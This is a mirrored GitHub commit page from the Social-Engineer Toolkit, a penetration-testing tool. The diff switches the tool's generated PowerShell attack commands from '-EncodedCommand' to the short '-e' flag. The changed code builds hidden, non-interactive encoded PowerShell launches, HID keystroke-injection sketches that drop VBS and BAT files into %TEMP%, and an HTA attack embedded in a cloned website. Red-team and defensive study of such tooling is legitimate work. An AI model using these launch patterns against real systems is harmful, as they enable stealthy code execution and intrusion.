mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-11-23 04:53:05 +00:00
convert encodedcommand to -e abbreviated
This commit is contained in:
parent
c27dee6ea0
commit
0ff64fcae0
7 changed files with 12 additions and 6 deletions
|
@ -1,3 +1,9 @@
|
|||
~~~~~~~~~~~~~~~~
|
||||
version 7.4.1
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
||||
* converted all powershell encodedcommand to abbreviated
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 7.4
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
|
|
@ -262,7 +262,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
x86 = file(core.setdir + "x86.powershell").read().rstrip()
|
||||
# x86 = x86.read()
|
||||
|
||||
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
|
||||
x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
|
||||
core.print_status("If you want the powershell commands and attack, "
|
||||
"they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
|
||||
filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
||||
|
|
|
@ -86,7 +86,7 @@ try:
|
|||
#with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
|
||||
# x86 = fileopen.read()
|
||||
x86 = open(core.setdir + "x86.powershell", "r").read()
|
||||
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
|
||||
x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
|
||||
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
|
||||
filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
||||
filewrite.write(x86)
|
||||
|
|
|
@ -57,7 +57,7 @@ if powershell_menu_choice != "99":
|
|||
# here we format everything for us
|
||||
with open(core.setdir + "/x86.powershell") as fileopen:
|
||||
x86 = fileopen.read()
|
||||
x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86
|
||||
x86 = "powershell -nop -window hidden -noni -e " + x86
|
||||
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/")))
|
||||
with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite:
|
||||
filewrite.write(x86)
|
||||
|
|
|
@ -373,7 +373,7 @@ void loop()
|
|||
// run through cmd
|
||||
CommandAtRunBar("cmd");
|
||||
delay(1000);
|
||||
Keyboard.println("powershell -EncodedCommand {powershell_command}");
|
||||
Keyboard.println("powershell -e {powershell_command}");
|
||||
delay(4000);
|
||||
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
|
||||
Keyboard.println("echo WshShell.Run chr(34) ^& \\"%TEMP%\\\\{bat}\\" ^& Chr(34), 0 >> %TEMP%\\\\{vbs}");
|
||||
|
|
|
@ -174,7 +174,7 @@ void setup()
|
|||
// run through cmd
|
||||
CommandAtRunBar("cmd");
|
||||
delay(1000);
|
||||
Keyboard.println("powershell -EncodedCommand {powershell_command}");
|
||||
Keyboard.println("powershell -e {powershell_command}");
|
||||
// Tweak this delay. Larger files take longer to decode through powershell.
|
||||
delay(10000);
|
||||
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
|
||||
|
|
|
@ -33,7 +33,7 @@ def gen_hta_cool_stuff():
|
|||
"Generating powershell injection code and x86 downgrade attack...")
|
||||
ps = generate_powershell_alphanumeric_payload(
|
||||
selection, ipaddr, port, "x86")
|
||||
command = ("powershell -window hidden -EncodedCommand " + ps)
|
||||
command = ("powershell -window hidden -e " + ps)
|
||||
# hta code here
|
||||
print_status("Embedding HTA attack vector and PowerShell injection...")
|
||||
# grab cloned website
|
||||
|
|
Loading…
Reference in a new issue